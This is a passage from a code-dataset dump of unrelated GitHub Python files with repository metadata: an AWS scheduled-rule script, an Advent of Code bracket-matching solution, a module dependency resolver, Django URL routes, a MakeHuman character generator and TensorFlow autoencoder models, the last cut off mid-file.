end_upload","repo_name":"LeoArruda/UdacityCapstoneDataEngineer","sub_path":"dags/taxi_ride_upload_files_dag.py","file_name":"taxi_ride_upload_files_dag.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42401756431","text":"import json\n\nimport boto3\n\n\ndef main():\n client = boto3.client('events')\n\n with open('./stepfunctions_name.json', 'r') as f:\n names = json.load(f)\n\n client.put_rule(\n Name=names['cloudwatch_events_name'],\n ScheduleExpression='cron(0 3 * * ? *)',\n State='ENABLED',\n )\n\n client.put_targets(\n Rule=names['cloudwatch_events_name'],\n Targets=[\n {\n 'Id': names['cloudwatch_events_id'],\n 'Arn': 'arn:aws:states:ap-northeast-1:829044821271:stateMachine:preprocess_pipeline', \n 'RoleArn': 'arn:aws:iam::829044821271:role/service-role/AWS_Events_Invoke_Step_Functions_1710309540'\n }\n ]\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"opeco17/illust_app","sub_path":"ml_infra/pre_process/create_cloudwatch_events.py","file_name":"create_cloudwatch_events.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"41991203314","text":"import math\n\nwith open('input.txt') as f:\n data = f.read().strip().split('\\n')\n\ndata = [list(line) for line in data]\n\n# Unused in part 1 but used here!\ndef handle(char):\n if char == '(':\n return ')'\n elif char == '{':\n return '}'\n elif char == '<':\n return '>'\n elif char == '[':\n return ']'\n\ndef calc_score(list_chars):\n score = 0;\n for char in list_chars:\n score *= 5\n\n if char == ')':\n score += 1\n elif char == ']':\n score += 2\n elif char == '}':\n score += 3\n elif char == '>':\n score += 4\n\n return score\n\ndef fix_incomplete(stack):\n additional = []\n for char in list(reversed(stack)):\n if char != ' ':\n additional.append(handle(char))\n return additional\n\ndef get_middle(scores):\n sorted_scores = sorted(scores)\n return sorted_scores[math.trunc(len(scores) / 2)]\n\ndef solve(input):\n scores = []\n for line in data:\n stack = []\n error = False\n for char in line:\n if char == ')':\n if stack[-1] == '(':\n stack.pop()\n else:\n error = True\n break\n elif char == '}':\n if stack[-1] == '{':\n stack.pop()\n else:\n error = True\n break\n elif char == '>':\n if stack[-1] == '<':\n stack.pop()\n else:\n error = True\n break\n elif char == ']':\n if stack[-1] == '[':\n stack.pop()\n else:\n error = True\n break\n else:\n stack.append(char)\n if not error:\n scores.append(calc_score(fix_incomplete(stack)))\n return get_middle(scores)\n\nprint('answer', solve(data))\n","repo_name":"jdlawrence/adventofcode2021","sub_path":"day10/day10-2.py","file_name":"day10-2.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30946036348","text":"import os.path\nimport sys\nimport site\nimport inspect\nimport types\nimport collections\n \n\nclass _DependencyResolver(object):\n \"\"\"\n Finds dependencies given a module object\n \"\"\"\n \n def __init__(self):\n self._modules = set()\n self._packages = collections.OrderedDict() # need an ordered set when merging namespace directories\n self._processed_modules = set()\n \n def add_dependencies(self, module):\n \"\"\"\n Adds a module and its dependencies to the list of dependencies\n \"\"\"\n # add the module as a dependency\n self._add_dependency(module)\n # recursively get the module's imports and add those as dependencies\n imported_modules = _get_imported_modules(module)\n #print (\"_get_imported_modules for {0}: {1}\".format(module.__name__, imported_modules))\n for imported_module_name,imported_module in imported_modules.items():\n if imported_module not in self._processed_modules:\n #print (\"add_dependencies for {0} {1}\".format(imported_module.__name__, imported_module))\n self.add_dependencies(imported_module)\n \n @property\n def modules(self):\n \"\"\"\n Property to get the list of module dependencies\n \"\"\"\n return frozenset(self._modules)\n \n @property\n def packages(self):\n \"\"\"\n Property to get the list of package dependencies\n \"\"\"\n return tuple(self._packages.keys()) \n \n def _add_dependency(self, module):\n \"\"\"\n Adds a module to the list of dependencies\n \"\"\"\n package_name = _get_package_name(module)\n if package_name:\n # module is part of a package\n # get the top-level package\n top_package_name = module.__name__.split('.')[0]\n top_package = sys.modules[top_package_name]\n if \"__path__\" in top_package.__dict__:\n # for regular packages, there is one top-level directory\n # for namespace packages, there can be more than one.\n # they will be merged in the bundle\n for top_package_path in reversed(list(top_package.__path__)):\n top_package_path = os.path.abspath(top_package_path)\n self._add_package(top_package_path)\n elif hasattr(top_package, '__file__'):\n # package that is an individual python file with empty __path__\n #print (\"Adding package that is an individual file\", top_package)\n self._add_package(os.path.abspath(top_package.__file__))\n elif hasattr(module, '__file__'):\n # individual Python module\n module_path = os.path.abspath(module.__file__)\n self._add_module(module_path)\n \n self._processed_modules.add(module)\n\n def _add_package(self, path):\n #print (\"Adding external package\", path)\n self._packages[path] = None\n \n def _add_module(self, path):\n #print (\"Adding external module\", path)\n self._modules.add(path)\n\n#####################\n# Utility functions #\n#####################\n \ndef _get_package_name(module):\n \"\"\"\n Gets the package name given a module object\n \n Returns:\n str: If the module belongs to a package, the package name. \n if the module does not belong to a package, None or ''.\n \"\"\"\n try:\n # if __package__ is defined, use it\n package_name = module.__package__\n except AttributeError:\n package_name = None \n \n if package_name is None:\n # if __path__ is defined, the package name is the module name\n package_name = module.__name__\n if not hasattr(module, '__path__'):\n # if __path__ is not defined, the package name is the\n # string before the last \".\" of the fully-qualified module name\n package_name = package_name.rpartition('.')[0]\n \n return package_name\n \ndef _get_module_name(function):\n \"\"\"\n Gets the function's module name\n Resolves the __main__ module to an actual module name\n Returns:\n str: the function's module name\n \"\"\"\n module_name = function.__module__\n if module_name == '__main__':\n # get the main module object of the function\n main_module = inspect.getmodule(function)\n # get the module name from __file__ by getting the base name and removing the .py extension\n # e.g. test1.py => test1\n if hasattr(main_module, '__file__'):\n module_name = os.path.splitext(os.path.basename(main_module.__file__))[0]\n return module_name\n\n\ndef _get_imported_modules(module):\n \"\"\"\n Gets imported modules for a given module\n The following modules are excluded: \n * built-in modules\n * modules that have \"com.ibm.streamsx.topology\" in the path\n * other system modules whose paths start with sys.prefix or sys.exec_prefix \n that are not inside a site package\n Returns:\n a dictionary of module names => modules\n \"\"\"\n imported_modules = {}\n #print (\"vars({0}): {1}\".format(module.__name__, vars(module)))\n for alias, val in vars(module).items():\n vars_module = None\n # module type\n if isinstance(val, types.ModuleType):\n vars_module = val\n # has __module__ attr, find module\n elif hasattr(val, '__module__') \\\n and val.__module__ in sys.modules:\n vars_module = sys.modules[val.__module__]\n # if we found a module, determine if it should be included\n # in the list of dependencies\n if vars_module: \n if not _is_builtin_module(vars_module) and \\\n not _is_streamsx_module(vars_module) and \\\n not _is_system_module(vars_module):\n imported_modules[vars_module.__name__] = vars_module\n return imported_modules\n\ndef _is_builtin_module(module):\n return module.__name__ in sys.builtin_module_names and \\\n not hasattr(module, '__file__') and \\\n not hasattr(module, '__path__')\n\ndef _is_streamsx_module(module):\n if hasattr(module, '__name__'):\n return module.__name__.startswith('streamsx.topology')\n return False\n\ndef _inside_site_package(path):\n \"\"\"\n Returns:\n True if the given path is for a site package, False otherwise\n \"\"\"\n return 'site-packages' in path\n\ndef _is_system_modulex(module_path):\n return not _inside_site_package(module_path) and \\\n (module_path.startswith((sys.prefix, sys.exec_prefix)) or \\\n (hasattr(sys, 'real_prefix') and module_path.startswith(sys.real_prefix)))\n \ndef _is_system_module(module):\n if hasattr(module, '__file__'):\n # module or regular package\n return _is_system_modulex(module.__file__)\n elif hasattr(module, '__path__'):\n # namespace package. assume system package if any path evaluates to true\n for module_path in list(module.__path__):\n if _is_system_modulex(module_path):\n return True\n return False\n","repo_name":"cancilla/streamsx.topology","sub_path":"com.ibm.streamsx.topology/opt/python/packages/streamsx/topology/dependency.py","file_name":"dependency.py","file_ext":"py","file_size_in_byte":7100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"28092949793","text":"from django.urls import path\nfrom . import views\n\n# app_name = 'library'\n\nurlpatterns = [\n path('', views.index, name='index'),\n\n path('books/', views.listBooks, name='books'),\n path('book/', views.bookDetails, name='book-detail'),\n path('book/add', views.BookCreate.as_view(), name='book-add'),\n path('book/update/', views.BookUpdate.as_view(), name='book-update'),\n path('book/delete/', views.BookDelete.as_view(), name='book-delete'),\n\n path('authors/', views.listAuthors, name='authors'),\n path('author/add', views.AuthorCreate.as_view(), name='author-add'),\n path('author/update/', views.AuthorUpdate.as_view(), name='author-update'),\n path('author/delete/', views.AuthorDelete.as_view(), name='author-delete'),\n\n]\n","repo_name":"puniami/RJLibrary","sub_path":"library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17514874532","text":"import random\nimport os\nimport shutil\nimport numpy as np\n\n# download shoes from http://www.makehumancommunity.org/clothes/dudoc_domsjeans1.html\n# download hair from http://www.makehumancommunity.org/clothes/mhair02.html\n# download top from http://www.makehumancommunity.org/clothes/ballet_costume.html\n# download bottom from http://www.makehumancommunity.org/clothes/m_trousers_01.html\n# put these files into folder named 'models'\n# generate_list: index, cloth texture, model folder name, model file name \n\n\ncloth_pic_Folder = 'cloth_pic/'\nperson_Folder = 'create_person/'\nperson_save_Folder = person_Folder + 'deepfashion_pair_models/'\nbasic_personID = 0\n\n\ndef readCSV2List(readCSV2List_filePath):\n try:\n readCSV2List_file = open(readCSV2List_filePath, 'r', encoding=\"gbk\")\n readCSV2List_context = readCSV2List_file.read()\n readCSV2List_result = readCSV2List_context.split(\"\\n\")\n readCSV2List_result_length = len(readCSV2List_result)\n for readCSV2List_i in range(readCSV2List_result_length):\n readCSV2List_result[readCSV2List_i] = readCSV2List_result[readCSV2List_i].split(\",\")\n return readCSV2List_result\n except Exception:\n print(\"Load data has some problem\")\n finally:\n readCSV2List_file.close();\n\ndef generateHuman(cloth_list, person_id, sex):\n haveAcc = 0\n # load acc\n hair = open('modeleTxt/hair.txt', 'r').readlines()\n shoe = open('modeleTxt/shoe.txt', 'r').readlines()\n pifu = open('modeleTxt/skin.txt', 'r').readlines()\n\n if not os.path.exists(person_save_Folder):\n os.makedirs(person_save_Folder)\n\n if sex > 0:\n Gender1 = 1000000\n else:\n Gender1 = 0\n # setting\n Gender = '%.6f' % (Gender1 / 1000000)\n Muscle = '%.6f' % (random.randint(0, 1000000) / 1000000)\n African_1 = random.randint(0, 1000000)\n African = '%.6f' % (African_1 / 1000000)\n Asian_1 = random.randint(0, 1000000 - African_1)\n Asian = '%.6f' % (Asian_1 / 1000000)\n Caucasian = '%.6f' % ((1000000 - Asian_1 - African_1) / 1000000)\n if Gender1 > 1000000 / 2:\n m_height = random.gauss(170, 5.7) / 200\n while m_height > 1:\n m_height = random.gauss(170, 5.7) / 200\n Height = '%.6f' % (m_height)\n else:\n m_height = random.gauss(160, 5.2) / 200\n while m_height > 1:\n m_height = random.gauss(160, 5.2) / 200\n Height = '%.6f' % (m_height)\n BreastSize = '%.6f' % (random.randint(0, 70) / 100)\n Age = '%.6f' % (random.randint(20, 90) / 100)\n BreastFirmness = '%.6f' % (random.randint(30, 100) / 100)\n Weight = '%.6f' % (random.randint(0, 1000000) / 1000000)\n\n file_name = 'B' + str(person_id)\n # creating person file\n f = open(person_save_Folder + file_name + \".mhm\", 'a')\n f.write('# Written by MakeHuman 1.1.1\\n')\n f.write('version v1.1.1\\n')\n f.write('tags ' + file_name + '\\n')\n f.write('camera 0.0 0.0 0.0 0.0 0.0 1.0\\n')\n f.write('modifier macrodetails-universal/Muscle ' + Muscle + '\\n')\n f.write('modifier macrodetails/African ' + African + '\\n')\n f.write('modifier macrodetails-proportions/BodyProportions 0.500000\\n')\n f.write('modifier macrodetails/Gender ' + Gender + '\\n')\n f.write('modifier macrodetails-height/Height ' + Height + '\\n')\n f.write('modifier breast/BreastSize ' + BreastSize + '\\n')\n f.write('modifier macrodetails/Age ' + Age + '\\n')\n f.write('modifier breast/BreastFirmness ' + BreastFirmness + '\\n')\n f.write('modifier macrodetails/Asian ' + Asian + '\\n')\n f.write('modifier macrodetails/Caucasian ' + Caucasian + '\\n')\n f.write('modifier macrodetails-universal/Weight ' + Weight + '\\n')\n f.write('skeleton cmu_mb.mhskel\\n')\n f.write('eyes HighPolyEyes 2c12f43b-1303-432c-b7ce-d78346baf2e6\\n')\n\n # adding clothes\n if Gender1 > 1000000 / 2:\n f.write(hair[random.randint(0, len(hair) - 1)])\n else:\n f.write(hair[random.randint(0, len(hair) - 1)])\n f.write(shoe[random.randint(0, len(shoe) - 1)])\n for i in range(0, len(cloth_list)):\n f.write(cloth_list[i]+'\\n')\n f.write('clothesHideFaces True\\n')\n f.write(pifu[random.randint(0, len(pifu) - 1)])\n f.write('material Braid01 eead6f99-d6c6-4f6b-b6c2-210459d7a62e braid01.mhmat\\n')\n f.write('material HighPolyEyes 2c12f43b-1303-432c-b7ce-d78346baf2e6 eyes/materials/brown.mhmat\\n')\n f.write('subdivide False\\n')\n\ndef createClothes(modelFolder,modelName, uuid, saveName, saveFolder, imgName):\n def create_mhclo(modelFolder,modelName, uuid, saveName, saveFolder):\n file = 'models/' + modelFolder + '/' + modelName + '.mhclo'\n savePath = saveFolder + '/' + modelFolder + '/'\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n with open(file, \"r\", encoding=\"utf-8\") as f1, open(savePath + '' + saveName + \".mhclo\", \"a\",\n encoding=\"utf-8\") as f2:\n for line in f1:\n if 'uuid' in line:\n line = 'uuid ' + uuid + '\\n'\n if 'name' in line:\n line = 'name ' + str(saveName) + '\\n'\n if 'material' in line:\n line = 'material ' + str(saveName) + '.mhmat' + '\\n'\n f2.write(line)\n for filename in os.listdir('models/' + modelFolder + '/'):\n if 'mhclo' not in filename and 'mhmat' not in filename:\n shutil.copy('models/' + modelFolder + '/' + filename, savePath)\n\n def create_mhmat(modelFolder,modelName, uuid, saveName, saveFolder, imgName):\n file = 'models/' + modelFolder + '/' + modelName + '.mhmat'\n savePath = saveFolder + '/' + modelFolder + '/'\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n with open(file, \"r\", encoding=\"utf-8\") as f1, open(savePath + saveName + \".mhmat\", \"a\",\n encoding=\"utf-8\") as f2:\n for line in f1:\n if 'name' in line:\n line = 'name ' + str(saveName) + '\\n'\n if 'diffuseTexture' in line:\n line = 'diffuseTexture ' + imgName + '\\n'\n f2.write(line)\n shutil.move(cloth_pic_Folder+imgName, savePath + imgName)\n\n create_mhclo(modelFolder,modelName, uuid, saveName, saveFolder)\n create_mhmat(modelFolder,modelName, uuid, saveName, saveFolder, imgName)\n\n\ndef create_pair_person():\n clothlist = readCSV2List('generate_list.csv')\n personID = basic_personID\n sex = 0\n for i in range(0, len(clothlist), 2):\n try:\n print(i)\n sex = (sex+1)%2\n pair_list = []\n for j in range (i,i+2):\n uuid = '20210919-0000-0000-0000-' + str(j).zfill(12)\n save_name = 'create_'+str(j).zfill(7)\n save_folder = person_Folder+str(personID)\n if not os.path.exists(save_folder):\n os.makedirs(save_folder)\n img_name = clothlist[j][1]\n pair_list.append('clothes ' + save_name + ' ' + uuid)\n createClothes(clothlist[j][2],clothlist[j][3], uuid, save_name, save_folder, img_name)\n generateHuman(pair_list, personID, sex)\n personID += 1\n except:\n print(i, personID)\ncreate_pair_person()\n","repo_name":"VideoObjectSearch/RandPerson","sub_path":"generateCode/generate_human_by_img/create_human_by_img.py","file_name":"create_human_by_img.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"77"} +{"seq_id":"30545691718","text":"from typing import List, Tuple, Dict\n\nimport tensorflow as tf\n\nfrom libs.network.network import add_symmetric_autoencoder, add_dense, parse_shape\n\n\nclass Autoencoder(tf.keras.Model):\n def __init__(\n self, p_dropout: float = 0.1,\n hidden_activation: str = \"relu\", out_activation: str = \"sigmoid\", layer_dims: List[int] = None,\n use_bias: bool = True, code_dim_override: int = None\n ):\n \"\"\"\n Create an autoencoder\n :param p_dropout: dropout percentage\n :param hidden_activation: activation function of the hidden layers\n :param out_activation: activation function of the output layer\n :param layer_dims: hidden layer dimensions from the input to the code, if None use a convolutional AE\n :param use_bias: include the bias vector in the layers (e.g. DeepSVDD does not use it)\n \"\"\"\n super(Autoencoder, self).__init__()\n\n # Model config\n self.p_dropout = p_dropout\n self.hidden_activation = hidden_activation\n self.out_activation = out_activation\n self.layer_dims = layer_dims\n self.use_bias = use_bias\n self.code_dim_override = code_dim_override\n\n if (layer_dims is not None) and (code_dim_override is not None):\n # Ok, it was a bad idea to enforce tuples\n new_layer_dims = list(layer_dims)\n new_layer_dims[-1] = code_dim_override\n self.layer_dims = new_layer_dims\n\n # Layers\n self.m_enc = None\n self.m_dec = None\n\n # Activation extractors\n self.m_enc_act = None\n self.m_dec_act = None\n self.m_dec_act_on_code = None\n self.m_all_act = None\n\n # -- Autoencoder Architectures --\n # Conv AE based on https://blog.keras.io/building-autoencoders-in-keras.html\n def _conv_encoder(self, input_shape) -> tf.keras.Model:\n model = tf.keras.Sequential(name=\"encoder\")\n\n model.add(tf.keras.layers.Conv2D(16, (3, 3), padding=\"same\", input_shape=input_shape[1:], use_bias=self.use_bias))\n model.add(tf.keras.layers.MaxPooling2D((2, 2), padding=\"same\"))\n model.add(tf.keras.layers.Activation(self.hidden_activation))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n model.add(tf.keras.layers.Conv2D(8, (3, 3), padding=\"same\", use_bias=self.use_bias))\n model.add(tf.keras.layers.MaxPooling2D((2, 2), padding=\"same\"))\n model.add(tf.keras.layers.Activation(self.hidden_activation))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n model.add(tf.keras.layers.Conv2D(8, (3, 3), padding=\"same\", use_bias=self.use_bias))\n model.add(tf.keras.layers.MaxPooling2D((2, 2), padding=\"same\"))\n model.add(tf.keras.layers.Activation(self.hidden_activation, name=\"code\"))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n return model\n\n def _conv_decoder(self, input_shape, output_shape):\n model = tf.keras.Sequential(name=\"decoder\")\n\n model.add(tf.keras.layers.Conv2D(8, (3, 3), padding=\"same\", input_shape=input_shape[1:], use_bias=self.use_bias))\n model.add(tf.keras.layers.Activation(self.hidden_activation))\n model.add(tf.keras.layers.UpSampling2D((2, 2)))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n model.add(tf.keras.layers.Conv2D(8, (3, 3), padding=\"same\", use_bias=self.use_bias))\n model.add(tf.keras.layers.Activation(self.hidden_activation))\n model.add(tf.keras.layers.UpSampling2D((2, 2)))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n if output_shape[1] == 32:\n model.add(tf.keras.layers.Conv2D(16, (3, 3), padding=\"same\", use_bias=self.use_bias))\n else:\n model.add(tf.keras.layers.Conv2D(16, (3, 3), use_bias=self.use_bias))\n model.add(tf.keras.layers.Activation(self.hidden_activation))\n model.add(tf.keras.layers.UpSampling2D((2, 2)))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n model.add(tf.keras.layers.Conv2D(\n output_shape[-1], (3, 3), activation=self.out_activation, padding=\"same\", name=\"target_output\", use_bias=self.use_bias\n ))\n\n return model\n\n def _dense_encoder(self, input_shape):\n model = tf.keras.Sequential(name=\"encoder\")\n\n add_dense(\n model, layer_dims=self.layer_dims[:-1], p_dropout=self.p_dropout,\n activation=self.hidden_activation, input_shape=input_shape[1:], use_bias=self.use_bias\n )\n # We add the last layer manually to name it accordingly\n model.add(tf.keras.layers.Dense(\n self.layer_dims[-1], activation=self.hidden_activation, name=\"code\", use_bias=self.use_bias\n ))\n\n return model\n\n def _dense_decoder(self, input_shape, output_dim):\n model = tf.keras.Sequential(name=\"decoder\")\n\n add_dense(\n model, layer_dims=list(reversed(self.layer_dims[:-1])), p_dropout=self.p_dropout,\n activation=self.hidden_activation, input_shape=input_shape[1:], use_bias=self.use_bias\n )\n # The last layer reconstructs the input\n model.add(tf.keras.layers.Dense(\n output_dim[-1], activation=self.out_activation, use_bias=self.use_bias\n ))\n\n return model\n\n # == Keras functions ==\n def build(self, input_shape):\n # Based on the given layers, we use a dense or convolutional AE\n self.m_enc = self._conv_encoder(input_shape) if self.layer_dims is None \\\n else self._dense_encoder(input_shape)\n self.m_dec = self._conv_decoder(self.m_enc.output_shape, input_shape) if self.layer_dims is None \\\n else self._dense_decoder(self.m_enc.output_shape, input_shape)\n\n self.build_extractors()\n\n def compile(self, learning_rate=0.0001, loss=\"binary_crossentropy\", optimizer=None, **kwargs):\n new_optimizer = tf.keras.optimizers.Adam(learning_rate)\n return super(Autoencoder, self).compile(optimizer=new_optimizer, loss=loss, **kwargs)\n\n def fit(self, x=None, y=None, batch_size=None, epochs=60, verbose=2, **kwargs):\n return super(Autoencoder, self).fit(x=x, y=y, batch_size=batch_size, epochs=epochs, verbose=verbose, **kwargs)\n\n def build_extractors(self):\n # On top, we build the activation extractors\n t_enc_act = tf.keras.layers.Concatenate()([\n tf.keras.layers.Flatten()(cur_layer.output) for cur_layer in self.m_enc.layers\n if isinstance(cur_layer, tf.keras.layers.Activation) or isinstance(cur_layer, tf.keras.layers.LeakyReLU)\n ])\n t_dec_act = tf.keras.layers.Concatenate()([\n tf.keras.layers.Flatten()(cur_layer.output) for cur_layer in self.m_dec.layers\n if isinstance(cur_layer, tf.keras.layers.Activation) or isinstance(cur_layer, tf.keras.layers.LeakyReLU)\n ])\n # Activation extractors\n self.m_enc_act = tf.keras.Model(self.m_enc.inputs, t_enc_act, name=\"act_enc\")\n self.m_dec_act_on_code = tf.keras.Model(self.m_dec.inputs, t_dec_act, name=\"act_dec_on_code\")\n self.m_dec_act = tf.keras.Model(\n self.m_enc.inputs, self.m_dec_act_on_code(self.m_enc(self.m_enc.inputs)), name=\"act_dec\"\n )\n\n # Concatenating both models gives us all activations\n t_all_act = tf.keras.layers.Concatenate()([\n self.m_enc_act(self.m_enc_act.inputs), self.m_dec_act(self.m_enc_act.inputs)\n ])\n self.m_all_act = tf.keras.Model(\n self.m_enc.inputs, t_all_act, name=\"act_all\"\n )\n\n @tf.function\n def call(self, inputs, training=False, mask=None):\n # Connect the encoder and decoder\n t_encoded = self.m_enc(inputs, training=training, mask=mask)\n t_decoded = self.m_dec(t_encoded, training=training, mask=mask)\n\n return t_decoded\n\n def get_config(self):\n config = {\n 'p_dropout': self.p_dropout,\n 'hidden_activation': self.hidden_activation,\n 'out_activation': self.out_activation,\n 'layer_dims': self.layer_dims,\n }\n\n base_config = super(Autoencoder, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\nclass MultiAutoencoder(Autoencoder):\n def __init__(self, n_experts: int, **kwargs):\n super(MultiAutoencoder, self).__init__(**kwargs)\n\n # Save models\n self.m_decs = None\n\n # Save configuration\n self.n_experts = n_experts\n\n def build(self, input_shape):\n # We might get a list of tensorshapes - they should all be equal\n if isinstance(input_shape[0], tf.TensorShape):\n input_shape = input_shape[0]\n\n super(MultiAutoencoder, self).build(input_shape=input_shape)\n\n # Use multiple decoders\n m_decs = [tf.keras.models.clone_model(self.m_dec) for i_expert in range(self.n_experts)]\n # Rename for unique names\n for i_dec, cur_dec in enumerate(m_decs):\n cur_dec._name = f\"decoder-{i_dec}\"\n self.m_decs = m_decs\n\n # Create a helper model returning the output of all decoders\n t_enc_in = self.m_enc.inputs\n t_enc_out = self.m_enc(t_enc_in)\n t_decs_on_input = [m_dec(t_enc_out) for m_dec in m_decs]\n self.m_dec = tf.keras.Model(\n t_enc_in, t_decs_on_input, name=\"multi_output\"\n )\n\n # Return the activation for each decoder based on the code\n t_dec_in = m_decs[0].inputs\n # Create a helper with the very same input\n t_dec_act = {m_dec: tf.keras.layers.Concatenate()([\n tf.keras.layers.Flatten()(cur_layer.output) for cur_layer in m_dec.layers\n if isinstance(cur_layer, tf.keras.layers.Activation) or isinstance(cur_layer, tf.keras.layers.LeakyReLU)\n ]) for m_dec in m_decs}\n m_dec_act = [\n tf.keras.Model(m_dec.inputs, t_dec_act[m_dec]) for m_dec in m_decs\n ]\n m_dec_act_on_in = [cur_dec_act(t_dec_in) for cur_dec_act in m_dec_act]\n # Activation extractors\n self.m_dec_act_on_code = tf.keras.Model(t_dec_in, m_dec_act_on_in, name=\"act_dec_on_code\")\n self.m_dec_act = tf.keras.Model(\n self.m_enc.inputs, self.m_dec_act_on_code(self.m_enc(self.m_enc.inputs)), name=\"act_dec\"\n )\n\n # All activations are a little hard to interpret (flatten all decoder acts?) - let's keep them None for now\n self.m_all_act = None\n\n @tf.function\n def call(self, inputs, training=False, mask=None):\n\n # If we have a single input, convert it to a list\n if isinstance(inputs, tf.Tensor):\n inputs = [inputs]\n\n # Out MultiAutoencoder uses the very same encoder, but separate decoders\n t_encoded = [\n self.m_enc(inputs[i_expert], training=training, mask=mask) for i_expert in range(self.n_experts)\n ]\n t_decoded = [\n self.m_decs[i_expert](t_encoded[i_expert], training=training, mask=mask) for i_expert in range(self.n_experts)\n ]\n\n return t_decoded\n\n def get_config(self):\n config = {\n 'n_experts': self.n_experts\n }\n\n base_config = super(MultiAutoencoder, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\nclass AdversarialAutoencoder(Autoencoder):\n def __init__(self, disc_dims: Tuple[int] = (40, 30, 20, 10, 5), clipping_val: float = .01, **kwargs):\n # We'll always use leakyrelus for the encoder - the decoder's dimensions are determined by \"hidden_activation\"\n super(AdversarialAutoencoder, self).__init__(p_dropout=0.0, **kwargs)\n\n # Config\n self.disc_dims = disc_dims\n self.clipping_val = clipping_val\n\n # Models\n self.m_disc = None\n\n # Optimiser\n self.recon_opt = None\n self.disc_opt = None\n self.dec_opt = None\n\n def get_discriminator(self, input_shape, name=\"discriminator\"):\n # Construct a simple feed-forward network\n m_disc = tf.keras.Sequential(name=name)\n add_dense(\n m_disc, layer_dims=self.disc_dims, activation=self.hidden_activation, input_shape=input_shape[1:],\n p_dropout=self.p_dropout\n )\n m_disc.add(tf.keras.layers.Dense(1))\n return m_disc\n\n # We use leaky ReLUs as inspired by DCGAN\n def _conv_encoder(self, input_shape, code_dim=8):\n inputs = tf.keras.layers.Input(shape=input_shape[1:])\n\n x = tf.keras.layers.Conv2D(filters=32, kernel_size=3, strides=2, padding='same')(inputs)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2D(filters=16, kernel_size=3, strides=2, padding='same')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2D(filters=8, kernel_size=3, strides=2, padding='same')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n z = tf.keras.layers.Conv2D(filters=code_dim if self.code_dim_override is None else self.code_dim_override, kernel_size=3, strides=2, padding='valid', name=\"code\")(x)\n\n model = tf.keras.Model(inputs=inputs, outputs=z, name=\"encoder\")\n return model\n\n def _conv_decoder(self, input_shape, output_dim):\n encoded = tf.keras.Input(shape=input_shape[1:])\n\n x = tf.keras.layers.Conv2DTranspose(filters=8, kernel_size=4, strides=2, padding='same')(encoded)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2DTranspose(filters=16, kernel_size=4, strides=2, padding='valid')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2DTranspose(filters=32, kernel_size=4, strides=2, padding='valid')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n decoded = tf.keras.layers.Conv2DTranspose(filters=1, kernel_size=4, strides=2, padding='same', activation=self.out_activation)(x)\n decoder = tf.keras.Model(inputs=encoded, outputs=decoded, name=\"decoder\")\n return decoder\n\n def _dense_encoder(self, input_shape):\n model = tf.keras.Sequential(name=\"encoder\")\n\n add_dense(\n model, layer_dims=self.layer_dims[:-1], p_dropout=self.p_dropout,\n activation=\"leakyrelu\", input_shape=input_shape[1:], use_bias=self.use_bias,\n add_batch_norm=True\n )\n # We add the last layer manually to name it accordingly\n model.add(tf.keras.layers.Dense(self.layer_dims[-1], name=\"code\"))\n\n return model\n\n def _dense_decoder(self, input_shape, output_dim):\n model = tf.keras.Sequential(name=\"decoder\")\n\n add_dense(\n model, layer_dims=list(reversed(self.layer_dims[:-1])), p_dropout=self.p_dropout,\n activation=self.hidden_activation, input_shape=input_shape[1:]\n )\n # The last layer reconstructs the input\n model.add(tf.keras.layers.Dense(\n output_dim[-1], activation=self.out_activation\n ))\n\n return model\n\n @staticmethod\n def recon_loss(y_true, y_pred, loss_f=tf.keras.losses.BinaryCrossentropy(from_logits=False)):\n return loss_f(y_true=y_true, y_pred=y_pred)\n\n @staticmethod\n def disc_loss(y_real, y_fake, loss_f=tf.keras.losses.BinaryCrossentropy(from_logits=True)):\n # Real => 1\n # real_loss = loss_f(\n # # tf.random.normal(tf.shape(y_real), mean=1.0, stddev=0.01),\n # y_true=tf.ones_like(y_real),\n # y_pred=y_real\n # )\n real_loss = - tf.reduce_mean(y_real)\n\n # Fake => 0\n # fake_loss = loss_f(\n # # tf.random.normal(tf.shape(y_fake), mean=0.0, stddev=0.01),\n # y_true=tf.zeros_like(y_fake),\n # y_pred=y_fake\n # )\n fake_loss = tf.reduce_mean(y_fake)\n\n return real_loss + fake_loss\n\n @staticmethod\n def enc_loss(y_fake, loss_f=tf.keras.losses.BinaryCrossentropy(from_logits=True)):\n # Fake => Real = 1\n # fake_loss = loss_f(\n # # 